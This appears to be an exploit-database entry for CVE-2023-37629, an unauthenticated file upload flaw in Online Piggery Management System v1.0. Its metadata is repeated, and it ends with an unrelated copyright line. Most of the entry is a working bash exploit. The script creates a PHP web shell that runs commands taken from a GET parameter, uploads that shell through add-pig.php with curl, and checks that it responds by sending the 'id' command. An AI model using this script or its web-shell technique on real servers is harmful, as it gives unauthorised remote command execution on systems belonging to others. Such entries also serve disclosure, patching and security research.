Online Piggery Management System v1.0 - unauthenticated file upload vulnerability
Author: 1337kid
type: webapps
platform: php
port:
date_added: 2023-07-19
date_updated: 2023-07-21
verified: 1
codes: CVE-2023-37629
tags:
aliases:
screenshot_url:
application_url:
raw file: 51598.sh
type: webapps
platform: php
port:
date_added: 2023-07-19
date_updated: 2023-07-21
verified: 1
codes: CVE-2023-37629
tags:
aliases:
screenshot_url:
application_url:
raw file: 51598.sh
#!/bin/bash # Exploit Title: Online Piggery Management System v1.0 - unauthenticated file upload vulnerability # Date: July 12 2023 # Exploit Author: 1337kid # Software Link: https://www.sourcecodester.com/php/11814/online-pig-management-system-basic-free-version.html # Version: 1.0 # Tested on: Ubuntu # CVE : CVE-2023-37629 # # chmod +x exploit.sh # ./exploit.sh web_url # ./exploit.sh http://127.0.0.1:8080/ echo " _____ _____ ___ __ ___ ____ ________ __ ___ ___ " echo " / __\\ \\ / / __|_|_ ) \\_ )__ /__|__ /__ / /|_ ) _ \\" echo " | (__ \\ V /| _|___/ / () / / |_ \\___|_ \\ / / _ \\/ /\\_, /" echo " \\___| \\_/ |___| /___\\__/___|___/ |___//_/\\___/___|/_/ " echo " @1337kid" echo if [[ $1 == '' ]]; then echo "No URL specified!" exit fi base_url=$1 unauth_file_upload() { # CVE-2023-37629 - File upload vuln echo "Generating shell.php" #=========== cat > shell.php << EOF <?php system(\$_GET['cmd']); ?> EOF #=========== echo "done" curl -s -F pigphoto=@shell.php -F submit=pwned $base_url/add-pig.php > /dev/null req=$(curl -s -I $base_url"uploadfolder/shell.php?cmd=id" | head -1 | awk '{print $2}') if [[ $req == "200" ]]; then echo "Shell uploaded to $(echo $base_url)uploadfolder/shell.php" else echo "Failed to upload a shell" fi } req=$(curl -I -s $base_url | head -1 | awk '{print $2}') if [[ $req -eq "200" ]]; then unauth_file_upload else echo "Error" echo "Status Code: $req" fi
Copyright © 2024 Irfan TOOR all rights reserved.